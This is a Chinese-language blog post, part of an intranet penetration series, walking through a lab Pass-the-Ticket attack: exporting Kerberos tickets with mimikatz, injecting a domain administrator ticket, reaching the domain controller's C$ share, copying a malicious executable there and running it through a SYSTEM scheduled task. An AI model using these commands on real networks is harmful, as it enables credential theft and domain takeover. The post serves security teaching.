宜宾微信网站建设,小影wordpress主题,能用pinduoduo做网站吗,云南建设厅建筑业管理网站系列文章第一章节之基础知识篇
内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内网渗透(五)之基础知识-Active Directory活动目录介绍和使用 内网渗透(六)之基…系列文章第一章节之基础知识篇
内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内网渗透(五)之基础知识-Active Directory活动目录介绍和使用 内网渗透(六)之基础知识-域中的权限划分和基本思想 内网渗透(七)之基础知识-企业常见安全域划分和结构 内网渗透(八)之基础知识-企业域中计算机分类和专业名
系列文章第二章节之内网信息收集篇
内网渗透(九)之内网信息收集-手动本地信息收集 内网渗透(十)之内网信息收集-编写自动化脚本收集本地信息 内网渗透(十一)之内网信息收集-内网IP扫描和发现 内网渗透(十二)之内网信息收集-内网端口扫描和发现 内网渗透(十三)之内网信息收集-收集域环境中的基本信息 内网渗透(十四)之内网信息收集-域环境中查找域内用户基本信息 内网渗透(十五)之内网信息收集-域环境中定位域管理员 内网渗透(十六)之内网信息收集-powershell基础知识 内网渗透(十七)之内网信息收集-powershell收集域内信息和敏感数据定位
系列文章第三章节之Windows协议认证和密码抓取篇
内网渗透(十八)之Windows协议认证和密码抓取-本地认证(NTML哈希和LM哈希 内网渗透(十九)之Windows协议认证和密码抓取-网络认证(基于挑战响应认证的NTLM协议) 内网渗透(二十)之Windows协议认证和密码抓取-域认证(Kerberos协议) 内网渗透(二十一)之Windows协议认证和密码抓取-Golden Ticket黄金票据制作原理及利用方式 内网渗透(二十二)之Windows协议认证和密码抓取-Silver Ticket白银票据制作原理及利用方式 内网渗透(二十三)之Windows协议认证和密码抓取-Mimikatz介绍和各种模块使用方法 内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码 内网渗透(二十五)之Windows协议认证和密码抓取-使用Hashcat和在线工具破解NTLM Hash 内网渗透(二十六)之Windows协议认证和密码抓取-浏览器、数据库等其他密码的抓取 内网渗透(二十七)之Windows协议认证和密码抓取-Windows其他类型抓取NTLM HASH工具 内网渗透(二十八)之Windows协议认证和密码抓取-Windows RDP凭证的抓取和密码破解 内网渗透(二十九)之Windows协议认证和密码抓取-Windows-2012R2之后抓取密码的方式和抓取密码的防范措施
系列文章第四章节之横向移动篇
内网渗透(三十)之横向移动篇-利用远控工具向日葵横向移动 内网渗透(三十一)之横向移动篇-利用远控工具todesk横向移动 内网渗透(三十二)之横向移动篇-利用远控工具GoToHTTP横向移动 内网渗透(三十三)之横向移动篇-利用远控工具RustDESK横向移动 内网渗透(三十四)之横向移动篇-IPC配合计划任务横向移动 内网渗透(三十五)之横向移动篇-IPC配合系统服务横向移动 内网渗透(三十六)之横向移动篇-Password Spraying密码喷洒攻击和域内用户枚举横向移动 内网渗透(三十七)之横向移动篇-Pass the Hash 哈希传递攻击(PTH)横向移动 内网渗透(三十八)之横向移动篇-pass the key 密钥传递攻击(PTK)横向攻击
注阅读本编文章前请先阅读系列文章以免造成看不懂的情况
pass the ticket 票据传递攻击(PTT)横向攻击
票据传递介绍
要想使用mimikatz的哈希传递功能,必须具有本地管理员权限。 mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法
例如票据传递( PassThe Ticket,PTT)
票据传递是基于kerberos认证的一种攻击方式常用来做后渗透权限维持。
黄金票据攻击利用的前提是得到了域内krbtgt用户的NTLM哈希或AES-256的值。
白银票据攻击利用的前提是得到了域内服务账号的HTML哈希或AES-256的值。
票据传递攻击一般分为两种
1、自己制作票据 2、传递内存中的票据
实验复现
实验环境
机器名登录用户IPWindows server 2012域控administrator域管理员192.168.41.10windows server 2012-2域内主机administrator本地管理员192.168.41.15
首先我们通过木马或者钓鱼等各种方法拿下windows server 2012-2主机的权限 然后我们导出机器内存中的票据
mimikatz sekurlsa::tickets /export执行以上命令后,会在当前目录下出现多个服务的票据文件,例如krbtgt、cifs、ldap等。 我们很幸运的导出了一张域管理员用户的高权限票据
清除内存中的票据
shell klist purge
mimikatz kerberos::purge
//两个都是清除票据将高权限的票据文件注入内存
mimikatz kerberos::ptt [0;24a93]-2-0-40e10000-Administratorkrbtgt-HACK.COM.kirbi查看票据
shell klist
mimikatz kerberos::tgt
//两个都是查看票据访问机器
dir \\dc.hack.com\C$现在由于我们有了域管理员权限的高权限票据导致可以让我们访问域控了接下来就是利用IPC配合计划任务上线域控了 这个artifact.exe就是我们要拷贝的恶意程序他被我们放置在Windows 2012-2主机上
拷贝恶意程序到域控上
copy artifact.exe \\dc.hack.com\C$schtasks命令创建计划任务
schtasks /create /s IP地址 /tn 计划任务名 /sc onstart /tr c:\文件 /ru system /fschtasks命令执行计划任务
schtasks /run /s IP地址 /i /tn 计划任务名目标机器域控成功上线